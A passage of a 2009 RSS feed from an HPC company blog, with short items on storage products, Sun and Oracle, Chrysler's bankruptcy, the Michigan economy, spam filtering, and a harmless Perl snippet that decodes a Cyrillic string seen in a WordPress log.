      <pubDate>Tue, 16 Jun 2009 23:36:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/there-are-fads-and-then-there-are-fads/</guid>
      <description>Sadly, technologists and IT people are not beyond buying into fads. A fad is basically a temporarily enhanced interest in some aspect of a market, or a product, or a technology. Fads pass. The repercussions of buying into fads can be &amp;hellip; well &amp;hellip; significant. So can the problem of missing the boat &amp;hellip; not on fads, but fads that develop legs and become, effectively, movements, groundswells, or even disruptive technologies.</description>
    </item>
    
    <item>
      <title>... and Rock gets canceled ...</title>
      <link>https://blog.scalability.org/2009/06/and-rock-gets-canceled/</link>
      <pubDate>Tue, 16 Jun 2009 14:12:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/and-rock-gets-canceled/</guid>
      <description>From the NYT, a blog post on the passing of Rock.
Been there, done that. SGI&amp;rsquo;s Beast and Alien. Would have been interesting chips. Killed because Itanium was going to conquer all. No, wait, I am not kidding &amp;hellip; It will &amp;hellip; eventually &amp;hellip; someday &amp;hellip; It appears little bits of hardware keep falling off the map. And HPC. Its gone. What does this mean to SGE, Lustre, the compiler groups &amp;hellip; Rock was an interesting chip.</description>
    </item>
    
    <item>
      <title>Egads ... Sun admitted Oracle really didn&#39;t want the whole enchilada ...</title>
      <link>https://blog.scalability.org/2009/06/egads-sun-admitted-oracle-really-didnt-want-the-whole-enchilada/</link>
      <pubDate>Mon, 15 Jun 2009 19:01:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/egads-sun-admitted-oracle-really-didnt-want-the-whole-enchilada/</guid>
      <description>Saw this on the Register (therefore it must be true)</description>
    </item>
    
    <item>
      <title>A quandry on partnerships</title>
      <link>https://blog.scalability.org/2009/06/a-quandry-on-partnerships/</link>
      <pubDate>Sun, 14 Jun 2009 12:51:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/a-quandry-on-partnerships/</guid>
      <description>The day job has had partnerships in the past, and maintains a number of active ones. We have reseller partnerships, joint service/support partnerships, development partnerships &amp;hellip; and so forth. Not all (or even a majority) are listed on our site. What we view as a partnership is a relationship which will be mutually beneficial &amp;hellip; aid both parties &amp;hellip; without causing harm to either. If we are going to partner, then there is a little of an exchange of something of value, so we get something akin to a 1+1=3 moment, for both organizations.</description>
    </item>
    
    <item>
      <title>OT:  Red Wings vs Pittsburgh in game 7 of Stanley Cup final</title>
      <link>https://blog.scalability.org/2009/06/ot-red-wings-vs-pittsburgh-in-game-7-of-stanley-cup-final/</link>
      <pubDate>Thu, 11 Jun 2009 17:31:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/ot-red-wings-vs-pittsburgh-in-game-7-of-stanley-cup-final/</guid>
      <description>Not really HPC, though our friends at PSC have named various supercomputers after Mario Lemieux &amp;hellip; Tomorrow night &amp;hellip; Wings vs Penguins, game 7. We may have to give special discounts if the Wings take the cup! [update] &amp;hellip; and its over. No discount for winning the cup. Wings didn&amp;rsquo;t start playing until 8 minutes left in the 3rd period. Ugh.</description>
    </item>
    
    <item>
      <title>The coming bi(tri?)furcation in HPC, part 1</title>
      <link>https://blog.scalability.org/2009/06/the-coming-bitrifurcation-in-hpc-part-1/</link>
      <pubDate>Wed, 10 Jun 2009 19:26:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/the-coming-bitrifurcation-in-hpc-part-1/</guid>
      <description>This will be short. Mostly a hat tip to Doug Eadline who in a very recent article talks about something we have been talking about privately for a while. Read the article, and afterwords, ponder a point he was discussing:
I believe so. Doug cautions people to not read into his words too much. This said, we are building very muscular desktops sporting 24 cores, 256 GB ram, 1+ GB/s IO channels, and accelerators of several flavors.</description>
    </item>
    
    <item>
      <title>[Warning:  Old news] Ouch ...</title>
      <link>https://blog.scalability.org/2009/06/ouch-2/</link>
      <pubDate>Wed, 10 Jun 2009 17:50:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/ouch-2/</guid>
      <description>[Warning] This is old news that got reposted as new.
From LinuxHPC.org (Ken Farmer&amp;rsquo;s excellent site) I saw this &amp;hellip;
I wonder if this impacts any TeamHPC or M&amp;amp;A; GSA contracts, which are usually quite &amp;hellip; explicit &amp;hellip; about lawsuit issues and eligibility for opportunities. They might have to go through a proxy if they can&amp;rsquo;t go direct.</description>
    </item>
    
    <item>
      <title>Chrysler sale approved</title>
      <link>https://blog.scalability.org/2009/06/chrysler-sale-approved/</link>
      <pubDate>Wed, 10 Jun 2009 00:18:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/chrysler-sale-approved/</guid>
      <description>The supreme court has just rescinded its stay of the sale. Understanding that I am a fan and returning customer to Chrysler (for its Jeep products), my biases should be clear &amp;hellip; this is very bad news to any senior creditor out there, dealing with a large troubled debtor, and a group with political patronage. Why would any bank or lending institution possibly grant a loan, if political considerations will outweigh legal considerations?</description>
    </item>
    
    <item>
      <title>On the price we all pay for SEO</title>
      <link>https://blog.scalability.org/2009/06/on-the-price-we-all-pay-for-seo/</link>
      <pubDate>Tue, 09 Jun 2009 16:26:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/on-the-price-we-all-pay-for-seo/</guid>
      <description>SEO is an attempt to influence an algorithm for ranking and displaying data entered into search systems. Google and other search engines perform many calculations to try to return &amp;ldquo;meaningful&amp;rdquo; results. Well, they use a particular definition of meaningful. One that involves what they considered to be a consensus &amp;hellip; if a page has lots of links to it from many other pages, then it must have meaning. This may have been true once.</description>
    </item>
    
    <item>
      <title>Chrysler hits a major bump</title>
      <link>https://blog.scalability.org/2009/06/chrysler-hits-a-major-bump/</link>
      <pubDate>Mon, 08 Jun 2009 21:30:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/chrysler-hits-a-major-bump/</guid>
      <description>[updated] see at bottom: Chrysler is an HPC user. I am a Chrysler customer. We have 2 Jeep Grand Cherokees. Words like &amp;ldquo;cold dead fingers&amp;rdquo; come to mind when I think about giving them up. Well, ok .. on the way in to the lab this morning, my interior roof is starting to leak &amp;hellip; 13 year old Jeep. Chrysler&amp;rsquo;s bankruptcy was engineered. Not well engineered, just engineered. In the process of setting it up, you saw political patronage completely derail legal rights, specifically senior versus junior creditors.</description>
    </item>
    
    <item>
      <title>We made the Great Lakes IT report this past Sunday</title>
      <link>https://blog.scalability.org/2009/06/we-made-the-great-lakes-it-report-this-past-sunday/</link>
      <pubDate>Mon, 08 Jun 2009 12:36:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/we-made-the-great-lakes-it-report-this-past-sunday/</guid>
      <description>I did email Matt Rousch to let him know what we are up to. Hopefully he will come by when we are testing the 96TB unit we sold :) Linky is here.</description>
    </item>
    
    <item>
      <title>The rise of the &#39;new&#39; issues: Data Motion</title>
      <link>https://blog.scalability.org/2009/06/the-rise-of-the-new-issues-data-motion/</link>
      <pubDate>Sun, 07 Jun 2009 17:29:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/the-rise-of-the-new-issues-data-motion/</guid>
      <description>I&amp;rsquo;ve been talking about data motion (moving data between place &amp;ldquo;a&amp;rdquo; and &amp;ldquo;b&amp;rdquo;) as a problem for a long time now. You can summarize it easily in a very simple equation, and use that to explain what is going wrong, and estimate how much we are going to suffer going forward. In a nutshell, data motion is measurable in the time it takes to copy a chunk of data between &amp;lsquo;places&amp;rsquo;.</description>
    </item>
    
    <item>
      <title>Press release from day job ... 96TB and Flash/SSD based JackRabbits!</title>
      <link>https://blog.scalability.org/2009/06/press-release-from-day-job/</link>
      <pubDate>Thu, 04 Jun 2009 18:43:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/press-release-from-day-job/</guid>
      <description>c.f. this link CANTON, MI - June 4, 2009 UTC - Scalable Informatics, a High Performance Computing solutions provider known for innovation, is pleased to announce the immediate availability of several new, low cost, high performance, high capacity, tightly coupled storage and processing systems. Scalable Informatics JackRabbit??? systems provide low cost, highly reliable RAID storage, with performance of 700 MB/s on low end systems, to in excess of 1.5 GB/s to disk using RAID 6 for midrange systems.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-04</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-04/</link>
      <pubDate>Thu, 04 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-04/</guid>
      <description>* 96TB, 5U, 48 honking fast drives, [http://scalableinformatics.com/jackrabbit](http://scalableinformatics.com/jackrabbit) , to be used for cloud computing storage targets [#](http://twitter.com/sijoe/statuses/2023205143)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Its official ... we have sold our first 96TB JR5 unit</title>
      <link>https://blog.scalability.org/2009/06/its-official-we-have-sold-our-first-96tb-jr5-unit/</link>
      <pubDate>Wed, 03 Jun 2009 23:45:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/its-official-we-have-sold-our-first-96tb-jr5-unit/</guid>
      <description>Waaaa hooooo!!!! This is also our first big Nehalem JackRabbit sale. For those who don&amp;rsquo;t know, JackRabbit is a cost effective, very fast, very powerful storage and integrated processing system. Units go from 2 to 5 rack units, with capacities from 9TB through 96TB, and cost starting well under $1/GB. Raw performance, performance density, and storage density make this an ideal component of a cluster storage or cloud storage system. This unit in particular is going to a cloud computing provider.</description>
    </item>
    
    <item>
      <title>Weee!  A new wordpress attack in the wild ... or is this an attack?  Or something worse?  SPAM mebbe?</title>
      <link>https://blog.scalability.org/2009/06/weee-a-new-wordpress-attack-in-the-wild-or-is-this-an-attack-or-something-worse-spam-mebbe/</link>
      <pubDate>Wed, 03 Jun 2009 12:59:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/weee-a-new-wordpress-attack-in-the-wild-or-is-this-an-attack-or-something-worse-spam-mebbe/</guid>
      <description>Sitting here, drinking coffee, preparing for the short ride into work (probably have to stop off at Meijer to pick up some turnovers &amp;hellip; mmmmm turnovers!) when I noticed this on my wordpress logs tail
Hey &amp;hellip; someone is trying to hack us. Cool. But what does this say?
Ok, let me use a quickie script to handle this for me &amp;hellip;
&amp;lt;code&amp;gt; #!/usr/bin/perl my $hex=&amp;quot;\xd0\xa1\xd0\xbf\xd0\xb0\xd1\x81\xd0\xb8\xd0\xb1\xd0\xbe, \xd0\xbf\xd0\xbe ... \xd1\x87\xd1\x82\xd0\xbe \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb5\xd1\x80\xd0\xbf\xd0\xbd\xd1\x83\xd1\x82\xd1\x8c&amp;quot;; printf &amp;quot;%s\n&amp;quot;,$hex; &amp;lt;/code&amp;gt;  Cool.</description>
    </item>
    
    <item>
      <title>Ok, this was also funny</title>
      <link>https://blog.scalability.org/2009/06/ok-this-was-also-funny/</link>
      <pubDate>Wed, 03 Jun 2009 04:19:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/ok-this-was-also-funny/</guid>
      <description>A reader pointed out that google chrome complained about this site. Said we spread malware. So I checked, and sure enough, got a message to that effect. Looking into it, it was complaining about something in an iframe in front of the video. This came from the link on youtube. So to get this correct &amp;hellip; Google was complaining about the embed code contained on youtube. Don&amp;rsquo;t think about this one too hard.</description>
    </item>
    
    <item>
      <title>Tangential, humorous, and akin to what we experience</title>
      <link>https://blog.scalability.org/2009/06/tangential-humorous-and-akin-to-what-we-experience/</link>
      <pubDate>Mon, 01 Jun 2009 13:28:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/tangential-humorous-and-akin-to-what-we-experience/</guid>
      <description>Doug showed me this video this morning. Its not about HPC, but what you see here is &amp;hellip; well &amp;hellip; strangely reminiscent of what we encounter when it comes time to negotiate a sale. It is humorous, only if you haven&amp;rsquo;t seen people try this stuff.
We have people try this stuff all the time with us.</description>
    </item>
    
    <item>
      <title>Finally:  Direct Postfixbogofilter integration</title>
      <link>https://blog.scalability.org/2009/05/finally-direct-postfixbogofilter-integration/</link>
      <pubDate>Sun, 31 May 2009 14:40:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/finally-direct-postfixbogofilter-integration/</guid>
      <description>We&amp;rsquo;ve been running a pipeline our spam tagging and virus removal for a while. It was integrated into the pipeline via procmail, not directly into postfix. Well, I finally figured out how to do one of the stages as an integrated tagger within postfix. Turns out to be fairly easy. And I didn&amp;rsquo;t create the method, I simply adapted it. We can always switch back to the other method if needed.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-30</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-30/</link>
      <pubDate>Sat, 30 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-30/</guid>
      <description>* Doug got the online store up, [http://scalableinformatics.com/catalog](http://scalableinformatics.com/catalog) JackRabbits and Pegasus(es) and Delta-V&#39;s ... buy as many as you want [#](http://twitter.com/sijoe/statuses/1965390591)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>New online store is up and live!!!</title>
      <link>https://blog.scalability.org/2009/05/new-online-store-is-up-and-live/</link>
      <pubDate>Fri, 29 May 2009 22:09:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/new-online-store-is-up-and-live/</guid>
      <description>Linky linky. You can buy JackRabbits, and Pegasus, and DeltaV (ΔV) &amp;hellip; all online, from the comfort of your armchair at home. And bunny slippers, must not forget the bunny slippers. You have to create an account on the site, and you need a real email and contact data to see pricing/enter stuff into the cart. Account creation will require administrator approval. It is very cool, Doug ordered several JackRabbits for himself this week&amp;hellip; None of this would have been possible, of course, without Doug, and his tireless and fearless pursuit of this function.</description>
    </item>
    
    <item>
      <title>Coming up for air .... gulp</title>
      <link>https://blog.scalability.org/2009/05/coming-up-for-air-gulp/</link>
      <pubDate>Fri, 29 May 2009 17:05:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/coming-up-for-air-gulp/</guid>
      <description>Wow &amp;hellip; this has been one of our most active days/weeks. I hope we don&amp;rsquo;t delay the PR, but I am clearly in need of additional hands. Doug suggested cloning, though this is illegal in the state of Michigan. I thought I had cleared my plate last night. Nope. No such luck.</description>
    </item>
    
    <item>
      <title>Two more down</title>
      <link>https://blog.scalability.org/2009/05/two-more-down/</link>
      <pubDate>Fri, 29 May 2009 04:44:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/two-more-down/</guid>
      <description>Visteon filed chapter 11 today. Visteon is parts supplier to Ford. Ford now has to help them out &amp;hellip; or risk not being able to get sub-assemblies. This is not good for Ford, significantly increases the risk for them. Metaldyne also filed. Metaldyne was a supplier to Chrysler. When Chrysler filed Chapter 11, well, suppliers won&amp;rsquo;t get paid for a while &amp;hellip; if at all.
Metaldyne will sell chunks of itself off.</description>
    </item>
    
    <item>
      <title>The risk of bricking, and the lessons that people need to learn</title>
      <link>https://blog.scalability.org/2009/05/the-risk-of-bricking-and-the-lessons-that-people-need-to-learn/</link>
      <pubDate>Fri, 29 May 2009 04:01:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/the-risk-of-bricking-and-the-lessons-that-people-need-to-learn/</guid>
      <description>I read several excellent synopses from SiCortex former staff such as Jeff Darcy, and Matt Reilly. Jeff and Matt gave several excellent arguments as to why SiCortex succeeded, despite getting the plug pulled. Some will guffaw about this, and say that pulling the plug was evidence of failure. They would be wrong. VCs will pull plugs everywhere from pre-term sheet to capital call time. Their rationale for pulling plugs won&amp;rsquo;t always make sense, to you, or others.</description>
    </item>
    
    <item>
      <title>Plugins for email followup installed</title>
      <link>https://blog.scalability.org/2009/05/plugins-for-email-followup-installed/</link>
      <pubDate>Fri, 29 May 2009 01:34:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/plugins-for-email-followup-installed/</guid>
      <description>You have to have registered for an account to use them, and you have to be logged in to enable it. I removed as many &amp;ldquo;garbage&amp;rdquo; accounts as I could find. If I removed your account and it wasn&amp;rsquo;t garbage, please accept my apology. If I see an increase in garbage account registrations, I&amp;rsquo;ll change the registration procedures. I hope I don&amp;rsquo;t have to do it. I tried the follow up, I think it is working (I got the email).</description>
    </item>
    
    <item>
      <title>Looks like our first 96TB JR5 will be sold early next week</title>
      <link>https://blog.scalability.org/2009/05/looks-like-our-first-96tb-jr5-will-be-sold-early-next-week/</link>
      <pubDate>Wed, 27 May 2009 16:59:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/looks-like-our-first-96tb-jr5-will-be-sold-early-next-week/</guid>
      <description>We have &amp;hellip; well &amp;hellip; lots of interest from cloud folk. And cluster folk. And &amp;hellip; well &amp;hellip; you get it. More soon. And yes, the PR is open in OO v3.0.1 on my desktop as we speak. If I do my job right, it should be out Friday.</description>
    </item>
    
    <item>
      <title>24 hour rule --- revoked</title>
      <link>https://blog.scalability.org/2009/05/24-hour-rule/</link>
      <pubDate>Wed, 27 May 2009 16:57:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/24-hour-rule/</guid>
      <description>[update] In multiple conversations/emails today, I learned that this was indeed true. The link to InsideHPC story is here. Vipin and I were rooting for them, as the technology was interesting, the approach different, and the value apparent. This was before we talked to them about possibly working together. This company did have good technology, did have great people. Now a VC/financial group has assets they have to sell. Maybe someone can explain to me how that is more valuable than a viable functioning growing going concern, generating revenue, closing in on break even.</description>
    </item>
    
    <item>
      <title>Apparently, we ain&#39;t seen nothin&#39; ... yet ...</title>
      <link>https://blog.scalability.org/2009/05/apparently-we-aint-seen-nothin-yet/</link>
      <pubDate>Tue, 26 May 2009 11:50:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/apparently-we-aint-seen-nothin-yet/</guid>
      <description>You can hear lots of people talking over the last few weeks, how we are &amp;ldquo;bottoming out&amp;rdquo; in terms of the economy. Privately, I had wondered if this was merely a dead cat bounce. With oil now rapidly rising, articles are appearing that start to call into question the impact upon the economy. Turning what they authors hope to be nascent recoveries into what they predict to be additional (significant) declines.</description>
    </item>
    
    <item>
      <title>Ok, I got sick of the spam, changed the mailer back</title>
      <link>https://blog.scalability.org/2009/05/ok-i-got-sike-of-the-spam-changed-the-mailer-back/</link>
      <pubDate>Mon, 25 May 2009 23:58:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/ok-i-got-sike-of-the-spam-changed-the-mailer-back/</guid>
      <description>About a month ago, I altered our SMTP daemon to not be so picky about mail. Previous to this, I had turned on and tweaked many anti-spam things. One of my favorites so far has been spf. Turns out, that lots of mailers are incorrectly configured. That is being generous. Lots of mailers are on the internet, and not complying with RFCs, which makes it real hard to distinguish spam sources from real mailers.</description>
    </item>
    
    <item>
      <title>One target.pl to rule them all, and on the server, bind them</title>
      <link>https://blog.scalability.org/2009/05/one-targetpl-to-rule-them-all-and-on-the-server-bind-them/</link>
      <pubDate>Mon, 25 May 2009 17:35:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/one-targetpl-to-rule-them-all-and-on-the-server-bind-them/</guid>
      <description>Imagine if you will, a single consistent command line interface to setting up and managing file and block based IO targets. Well, we have this mostly operational now for NFS, and are working on the iSCSI, SRP, AoE, SMB, and a few other targets while we are at it. Targets are added via plugins which handle the workflow of setup/teardown, etc. This is the updated version of our API. And it is an integral part of our STorAge SHell, used for managing huge storage systems.</description>
    </item>
    
    <item>
      <title>An observation on the quality of the Perl build in Ubuntu 9.04</title>
      <link>https://blog.scalability.org/2009/05/an-observation-on-the-quality-of-the-perl-build-in-ubuntu-904/</link>
      <pubDate>Mon, 25 May 2009 17:16:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/an-observation-on-the-quality-of-the-perl-build-in-ubuntu-904/</guid>
      <description>I have long ago given up on the perl builds in Redhat and build-alikes. To call them broken is &amp;hellip; well &amp;hellip; to be unfair to things that are merely broken. The Redhat/Centos Perls are basically completely hosed, in part due to incorporating bad patch mixes, poor build Config options, etc. Some will claim that despite the broken-ness of the build, it is better to stick with this build, and not install updated/corrected modules via CPAN.</description>
    </item>
    
    <item>
      <title>I had to try this ...</title>
      <link>https://blog.scalability.org/2009/05/i-had-to-try-this/</link>
      <pubDate>Sat, 23 May 2009 03:41:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/i-had-to-try-this/</guid>
      <description>[gallery link=&amp;ldquo;file&amp;rdquo; columns=&amp;ldquo;2&amp;rdquo;] Yeah &amp;hellip; well &amp;hellip; At least it recognizes it could be humorous. Look at the bottom of the image &amp;hellip;</description>
    </item>
    
    <item>
      <title>A simple statement</title>
      <link>https://blog.scalability.org/2009/05/a-simple-statement/</link>
      <pubDate>Fri, 22 May 2009 02:16:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/a-simple-statement/</guid>
      <description>Yesterday, I got into a discussion with Sean Eddy at Janelia farms over the change in HMMer. Today I saw this online. Let me be clear. The name &amp;ldquo;HMMer&amp;rdquo; is Sean&amp;rsquo;s, and he can do with it what he wants. My concern was about something different, which we are going to adapt to. We are working to make sure we are correctly respecting his rights, while at the same time supporting users with a &amp;ldquo;business&amp;rdquo; case for using the existing code.</description>
    </item>
    
    <item>
      <title>Ugh: 12.9% and climbing</title>
      <link>https://blog.scalability.org/2009/05/ugh-129-and-climbing/</link>
      <pubDate>Thu, 21 May 2009 15:13:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/ugh-129-and-climbing/</guid>
      <description>While the rest of the nation deals with a persistent and painful recession, with associated job loss, business activity slowdown, Michigan pretty much leads the nation in unemployment. This is not a good thing to lead the nation in. Job production. That would be good. VC and capital investment. That would be good. Educational accomplishment and R&amp;amp;D; dollars invested. That would be good. Unemployment? Not so much good.</description>
    </item>
    
    <item>
      <title>Short program last night on NPR about banks</title>
      <link>https://blog.scalability.org/2009/05/short-program-last-night-on-npr-about-banks/</link>
      <pubDate>Thu, 21 May 2009 12:44:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/short-program-last-night-on-npr-about-banks/</guid>
      <description>Our bank is one that failed its stress test, but just got another $13B by selling stock. Ok, we are being told the credit market is unfreezing. LIBOR is falling. Good. What does this mean for small businesses? Precisely squat.
Yup, you got it. Our credit market is frozen solid. The bank analysts admitted, on the radio program, that what the banks were doing was hording cash. The banks want to pay back TARP as soon as possible.</description>
    </item>
    
    <item>
      <title>Short article on the growth of accelerators in life science work</title>
      <link>https://blog.scalability.org/2009/05/short-article-on-the-growth-of-accelerators-in-life-science-work/</link>
      <pubDate>Tue, 19 May 2009 21:39:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/short-article-on-the-growth-of-accelerators-in-life-science-work/</guid>
      <description>I am quoted in there quite a bit. This is GenomeWeb magazine covering the many aspects of what is called Bio-IT. One of the massive problems around Bio-IT is moving data (go figure), storing data (again &amp;hellip;), and processing data. I&amp;rsquo;ve heard some people provide arguments as to why accelerators won&amp;rsquo;t play there &amp;hellip; and then I hear from people who have a limited time to get their work done, subject to an ever growing mound of data.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-19</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-19/</link>
      <pubDate>Tue, 19 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-19/</guid>
      <description>* @[mndoci](http://twitter.com/mndoci) should we assume our friend &amp;quot;Chad&amp;quot; wasn&#39;t invited to that party ... ? Too bad we can&#39;t do that here ... [in reply to mndoci](http://twitter.com/mndoci/statuses/1830463079) [#](http://twitter.com/sijoe/statuses/1836024323)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Doing a bit more performance testing on the big JR4</title>
      <link>https://blog.scalability.org/2009/05/doing-a-bit-more-performance-testing-on-the-big-jr4/</link>
      <pubDate>Mon, 18 May 2009 21:27:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/doing-a-bit-more-performance-testing-on-the-big-jr4/</guid>
      <description>[This was an older post from a few weeks ago, sitting in my queue. Cleared it out] Want to burn it in. Played with an experimental kernel, and found the Mellanox drivers wouldn&amp;rsquo;t build. Too many things have changed from 2.6.27 to 2.6.29.2. Ok, reloaded with Centos 5.3. Will stress test the default kernel. For some reason, we were hitting a strange SSD-RAID interaction, so I swapped out the SSD pair for spinning rust pair.</description>
    </item>
    
    <item>
      <title>Chromium for Linux (Google Chrome for Linux)</title>
      <link>https://blog.scalability.org/2009/05/chromium-for-linux-google-chrome-for-linux/</link>
      <pubDate>Sun, 17 May 2009 16:22:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/chromium-for-linux-google-chrome-for-linux/</guid>
      <description>Technically, from a branding scenario, Chromium isn&amp;rsquo;t Chrome. Ignore that for a moment. Chromium is out for Linux. It is a new/alternative browser for Linux. It is much better than firefox in terms of raw speed. And from the memory leaks I have seen in the latest FF, and the instability of the program (its a crap shoot as to whether it will load a page or not, not to mention all the rendering bugs) &amp;hellip; Chromium, in its current pre-alpha state, is a better browser than FF.</description>
    </item>
    
    <item>
      <title>What happens when economic development ... doesn&#39;t work?</title>
      <link>https://blog.scalability.org/2009/05/what-happens-when-economic-development-doesnt-work/</link>
      <pubDate>Sun, 17 May 2009 14:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/what-happens-when-economic-development-doesnt-work/</guid>
      <description>Interesting article in the Freep today. It points out that Michigan has shed about 700k jobs in a decade, while the MEDC has managed to create, or in more realistic terms, preserve, 43k jobs. Thats roughly 1 job created for every 16 lost. Understand that Michigan has been the home to the US auto industry, and in most cases, every other industry here has played, at best, a distant second fiddle to it from an economic and political clout view.</description>
    </item>
    
    <item>
      <title>and so it ends ...</title>
      <link>https://blog.scalability.org/2009/05/and-so-it-ends/</link>
      <pubDate>Thu, 14 May 2009 23:24:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/and-so-it-ends/</guid>
      <description>From Yahoo</description>
    </item>
    
    <item>
      <title>Took me long enough ... I finally fixed the certs!</title>
      <link>https://blog.scalability.org/2009/05/took-me-long-enough-i-finally-fixed-the-certs/</link>
      <pubDate>Thu, 14 May 2009 03:36:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/took-me-long-enough-i-finally-fixed-the-certs/</guid>
      <description>This was bad of me. For years, we&amp;rsquo;ve been using self signed certs for lots of things. I figured we wouldn&amp;rsquo;t host our own store, or do other things like that. Well, all that is going to change. The Amazon web-store is actually hard to use, and costs us too much. Not to mention the various restrictions they impose. So we are moving the store to our server. Look for the announcement soon.</description>
    </item>
    
    <item>
      <title>Microsoft raising large sums of cash ... for what?</title>
      <link>https://blog.scalability.org/2009/05/microsoft-raising-large-sums-of-cash-for-what/</link>
      <pubDate>Tue, 12 May 2009 22:47:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/microsoft-raising-large-sums-of-cash-for-what/</guid>
      <description>I&amp;rsquo;ve heard speculation of acquisitions. This would be the time for it. Valuations are down, and good companies can be had &amp;ldquo;on the cheap&amp;rdquo;. I&amp;rsquo;ve heard someone mention EMC as a target. Somehow &amp;hellip; well &amp;hellip; I don&amp;rsquo;t thinks so. Doesn&amp;rsquo;t seem like a good fit. I have a very odd sense of what a &amp;ldquo;good&amp;rdquo; fit would be. I am sure lots of folks will disagree. But it would solve many problems for Microsoft, right away.</description>
    </item>
    
    <item>
      <title>The future of the HPC market ... is it growing or shrinking?</title>
      <link>https://blog.scalability.org/2009/05/the-future-of-the-hpc-market-is-it-growing-or-shrinking/</link>
      <pubDate>Tue, 12 May 2009 04:42:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/the-future-of-the-hpc-market-is-it-growing-or-shrinking/</guid>
      <description>HPC as a market, is under stress, and will continue to be for a while. The Inquirer has an interesting article saying very similar things to what I have been saying for a while about the market. It is a very good read. I&amp;rsquo;ve been saying for years &amp;hellip; no &amp;hellip; decades now &amp;hellip; about 15 years to be frank, that HPC has been moving relentlessly downmarket. Each wave of its motion has a destructive impact upon the old order, and opens up the market wider to more people.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-10</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-10/</link>
      <pubDate>Sun, 10 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-10/</guid>
      <description>* thinking about work  must solve a driver issue do this on monday # * ok, that was an attempt at a haiku &amp;hellip; there is an implied newline after &amp;lsquo;work&amp;rsquo;, and &amp;lsquo;issue&amp;rsquo;. Maybe we need twitter-ku #
Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Some Sun shareholders are apparently pissed off at the deal ...</title>
      <link>https://blog.scalability.org/2009/05/some-sun-shareholders-are-apparently-pissed-off-at-the-deal/</link>
      <pubDate>Sat, 09 May 2009 20:41:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/some-sun-shareholders-are-apparently-pissed-off-at-the-deal/</guid>
      <description>From Computerworld:
Hmmm&amp;hellip; Breach of fiduciary duty? By board members? Nah &amp;hellip; couldn&amp;rsquo;t happen &amp;hellip; (yes, I am being sarcastic).
But these shareholders allege that the price was too low. I have to disagree with this. The market suggested a significantly lower price than Oracle paid. Its probably not worth pushing that point too hard, and just let Sun go gentle into the good night. Put another way, stop looking at this gift horse too closely.</description>
    </item>
    
    <item>
      <title>side stepping landmines</title>
      <link>https://blog.scalability.org/2009/05/side-stepping-landmines/</link>
      <pubDate>Fri, 08 May 2009 11:52:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/side-stepping-landmines/</guid>
